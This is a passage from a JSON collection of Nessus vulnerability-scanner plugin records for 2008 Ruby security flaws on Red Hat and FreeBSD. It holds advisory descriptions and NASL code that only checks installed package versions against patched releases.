memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "edition": 27, "published": "2008-10-22T00:00:00", "title": "RHEL 4 / 5 : ruby (RHSA-2008:0897)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3443", "CVE-2008-4310", "CVE-2008-1145", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "modified": "2008-10-22T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:irb", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:ruby", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:ruby-rdoc", "p-cpe:/a:redhat:enterprise_linux:ruby-irb", "p-cpe:/a:redhat:enterprise_linux:ruby-docs", "p-cpe:/a:redhat:enterprise_linux:ruby-ri", "p-cpe:/a:redhat:enterprise_linux:ruby-mode", "p-cpe:/a:redhat:enterprise_linux:ruby-libs", "cpe:/o:redhat:enterprise_linux:5.2", "p-cpe:/a:redhat:enterprise_linux:ruby-devel", "cpe:/o:redhat:enterprise_linux:4.7", "p-cpe:/a:redhat:enterprise_linux:ruby-tcltk"], "id": "REDHAT-RHSA-2008-0897.NASL", "href": "https://www.tenable.com/plugins/nessus/34466", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0897. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34466);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1145\", \"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3657\", \"CVE-2008-3790\", \"CVE-2008-3905\", \"CVE-2008-4310\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0897\");\n\n script_name(english:\"RHEL 4 / 5 : ruby (RHSA-2008:0897)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of\nservice attack via XML documents with large XML entity definitions\nrecursion. A specially crafted XML file could cause a Ruby application\nusing the REXML module to use an excessive amount of CPU and memory.\n(CVE-2008-3790)\n\nAn insufficient 'taintness' check flaw was discovered in Ruby's DL\nmodule, which provides direct access to the C language functions. An\nattacker could use this flaw to bypass intended safe-level\nrestrictions by calling external C functions with the arguments from\nan untrusted tainted inputs. (CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially crafted HTTP request\nto a WEBrick server that would cause the server to use an excessive\namount of CPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3905\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0897\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 22, 264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0897\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"irb-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-devel-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-docs-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-libs-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-mode-1.8.1-7.el4_7.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"ruby-tcltk-1.8.1-7.el4_7.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"ruby-devel-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-docs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-irb-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"ruby-libs-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-mode-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-rdoc-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-ri-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"ruby-tcltk-1.8.5-5.el5_2.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-irb / ruby-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:49:45", "description": "The official ruby site reports :\n\nSeveral vulnerabilities in safe level have been discovereds:.\n\n- untrace_var is permitted at safe level 4;\n\n- $PROGRAM_NAME may be modified at safe level 4;\n\n- insecure methods may be called at safe level 1-3;\n\n- syslog operations are permitted at safe level 4;\n\n- dl doesn't check taintness, so it could allow attackers to call\ndangerous functions.", "edition": 26, "published": "2008-08-17T00:00:00", "title": "FreeBSD : ruby -- multiple vulnerabilities in safe level (c329712a-6b5b-11dd-9d79-001fc61c2a55)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "modified": "2008-08-17T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ruby", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ruby+oniguruma", "p-cpe:/a:freebsd:freebsd:ruby+pthreads", "p-cpe:/a:freebsd:freebsd:ruby+pthreads+oniguruma"], "id": "FREEBSD_PKG_C329712A6B5B11DD9D79001FC61C2A55.NASL", "href": "https://www.tenable.com/plugins/nessus/33906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33906);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3905\");\n\n script_name(english:\"FreeBSD : ruby -- multiple vulnerabilities in safe level (c329712a-6b5b-11dd-9d79-001fc61c2a55)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The official ruby site reports :\n\nSeveral vulnerabilities in safe level have been discovereds:.\n\n- untrace_var is permitted at safe level 4;\n\n- $PROGRAM_NAME may be modified at safe level 4;\n\n- insecure methods may be called at safe level 1-3;\n\n- syslog operations are permitted at safe level 4;\n\n- dl doesn't check taintness, so it could allow attackers to call\ndangerous functions.\"\n );\n # http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1ff7ab4e\"\n );\n # https://vuxml.freebsd.org/freebsd/c329712a-6b5b-11dd-9d79-001fc61c2a55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?34aa0700\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby+oniguruma\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby+pthreads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby+pthreads+oniguruma\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=1.8.*,1<1.8.6.287,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=1.9.*,1<1.9.1.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads>=1.8.*,1<1.8.6.287,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads>=1.9.*,1<1.9.1.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads+oniguruma>=1.8.*,1<1.8.6.287,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads+oniguruma>=1.9.*,1<1.9.1.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+oniguruma>=1.8.*,1<1.8.6.287,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+oniguruma>=1.9.*,1<1.9.1.0,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T10:51:29", "description": "The official ruby site reports :\n\nWEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking\nrequests due to a backtracking regular expression in\nWEBrick::HTTPUtils.split_header_value.", "edition": 25, "published": "2008-08-17T00:00:00", "title": "FreeBSD : ruby -- DoS vulnerability in WEBrick (f7ba20aa-6b5a-11dd-9d79-001fc61c2a55)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "modified": "2008-08-17T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ruby", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ruby+oniguruma", "p-cpe:/a:freebsd:freebsd:ruby+pthreads", "p-cpe:/a:freebsd:freebsd:ruby+pthreads+oniguruma"], "id": "FREEBSD_PKG_F7BA20AA6B5A11DD9D79001FC61C2A55.NASL", "href": "https://www.tenable.com/plugins/nessus/33907", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33907);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3655\", \"CVE-2008-3656\", \"CVE-2008-3905\");\n\n script_name(english:\"FreeBSD : ruby -- DoS vulnerability in WEBrick (f7ba20aa-6b5a-11dd-9d79-001fc61c2a55)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The official ruby site reports :\n\nWEBrick::HTTP::DefaultFileHandler is faulty of exponential time taking\nrequests due to a backtracking regular expression in\nWEBrick::HTTPUtils.split_header_value.\"\n );\n # http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1ff7ab4e\"\n );\n # https://vuxml.freebsd.org/freebsd/f7ba20aa-6b5a-11dd-9d79-001fc61c2a55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13a54ece\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby+oniguruma\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby+pthreads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ruby+pthreads+oniguruma\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=1.8.*,1<1.8.6.111_5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby>=1.9.*,1<1.9.1.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads>=1.8.*,1<1.8.6.111_5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads>=1.9.*,1<1.9.1.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads+oniguruma>=1.8.*,1<1.8.6.111_5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+pthreads+oniguruma>=1.9.*,1<1.9.1.0,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+oniguruma>=1.8.*,1<1.8.6.111_5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ruby+oniguruma>=1.9.*,1<1.9.1.0,1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:45:07", "description": "Several vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3655\n Keita Yamaguchi discovered that several safe level\n restrictions are insufficiently enforced.\n\n - CVE-2008-3656\n Christian Neukirchen discovered that the WebRick module\n uses inefficient algorithms for HTTP header splitting,\n resulting in denial of service through resource\n exhaustion.\n\n - CVE-2008-3657\n It was discovered that the dl module doesn't perform\n taintness checks.\n\n - CVE-2008-3790\n Luka Treiber and Mitja Kolsek discovered that\n 